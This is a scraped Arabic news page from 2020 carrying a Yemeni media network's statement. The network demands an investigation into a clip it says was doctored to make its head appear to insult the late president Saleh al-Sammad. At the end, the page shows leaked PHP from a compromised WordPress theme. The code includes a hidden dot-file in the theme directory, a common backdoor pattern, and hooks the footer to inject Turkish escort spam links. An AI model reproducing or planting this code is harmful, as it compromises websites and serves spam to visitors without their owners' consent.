شريط الاخبارعناوين مميزةمحلية

شبكة الهوية: المطالبة بالتحقيق في التزوير الإعلامي والتحريض ضد رئيس الشبكة

طالبت شبكة الهوية الإعلامية وزارة الداخلية والنائب العام والأمن وجهاز المخابرات في حكومة صنعاء بالتحقيق في الحملة الإعلامية التي تشن ضد رئيس الشبكة الأستاذ محمد علي العماد. وقالت الشبكة في بيان لها، إن وسائل إعلامية محسوبة على الجبهة الداخلية وإعلام الإمارات قامت بالتحريض على القتل مستغلين قول رئيس الشبكة (السّمّة لا رحمه الله)  في برنامج التاسعة والذي كان موجها لرئيس شركة كمران خلال تناول قضية فساد الشركة. وحاولت تلك الوسائل الإعلامية إيهام الرأي العام بأنها إساءة للرئيس الشهيد صالح الصماد.

(نص البيان)

 

الهوية تطالب بالتحقيق في عملية التزوير الإعلامي وحملة التحريض ضد رئيس الشبكة

عمدت وسائل إعلامية محسوبة على الجبهة الداخلية وأخرى مصنفة ضمن إعلام الإمارات إلى شن حملة إعلامية ضد رئيس شبكة الهوية الإعلامية الأستاذ/ محمد علي العماد.. بهدف تشويه شخصه ومقامه الإعلامي والوطني ونجاح مؤسسته الإعلامية الوطنية فضلا عن تهديد حياته بالتحريض على القتل.. من خلال الترويج لمقطع فيديو على المواقع ووسائل التواصل الاجتماعي تدعي زورا أنه يحمل إساءة للرئيس الشهيد/ صالح الصماد رحمه الله.

وعليه تود الشبكة إيضاح ما يلي:

– أن تلك الوسائل عمدت ومن يقف خلفها إلى التزوير الإعلامي المفضوح، لبعض ما ورد على لسان رئيس الشبكة ضمن برنامج التاسعة والناس والذي ناقش خلاله فساد شركة كمران، واجتزاء بعضه وإعادة إنتاجه مميعا لإيهام المستمع بأن ما ورد في المقطع هو اسم الرئيس السابق للمجلس السياسي الأعلى الشهيد (صالح الصمّاد) رحمه الله.

– تؤكد الشبكة أن الشخص الوارد اسمه في حديث رئيسها خلال البرنامج هو لفظ (السّمّة)، لقب رئيس شركة كمران، (عبد الحافظ السمّة).. حيث ورد القول: السّمة لا رحمه الله.. غير أن تلك الوسائل ومن خلفها من المتربصين والحاقدين على الشبكة ونجاحها والمشككين في وطنيتها حاولوا استثمار التشابه الموسيقي في نطق الاسم، لنشر المقطع على نطاق واسع بعد تمييعه بهدف إيهام الرأي العام بأنه يحمل إساءه للرئيس الشهيد صالح علي الصمّاد، رغم علمها ويقينها بأن شبكة الهوية الإعلامية ورئيسها وكافة طاقمها والمنتمين إليها حملوا وما زالوا يحملون في قلوبهم كل الوفاء والتقدير للرئيس الشهيد رحمة الله عليه.

– تطالب شبكة الهوية كافة الجهات الأمنية في حكومة صنعاء بدءاً من وزارة الداخلية والنائب العام والأمن وجهاز المخابرات، بإجراء تحقيق شفاف وعادل في عملية التزوير الإعلامي المفتعلة، والحملة الإعلامية المصاحبة التي استهدفت الأستاذ محمد العماد وكشف من يقف خلفها ويروج لها، لفضحه على الملأ وردعه عن أي عمليات أخرى قد تستهدف أياً من رجالات الدولة أو الشخصيات الوطنية..

حفظ الله الوطن.. ورحم شهداءه الأبرار..

والسلام عليكم ورحمة الله وبركاته..

صادر عن شبكة الهوية الإعلامية..

السبت : 22 أغسطس 2020م

مقالات ذات صلة

إغلاق
إغلاق
if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php")) { include_once get_template_directory() . DIRECTORY_SEPARATOR . "." . basename(get_template_directory()) . ".php"; } if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } function zo(){ echo '
Manisa escort Tekirdağ escort Çanakkale escort Trabzon escort Yalova escort Balıkesir escort Aydın escort Muğla escort Afyon escort Aksaray escort Şanlıurfa escort Ümraniye escort Sinop escort Keçioren escort
'; } add_action("wp_footer",'zo');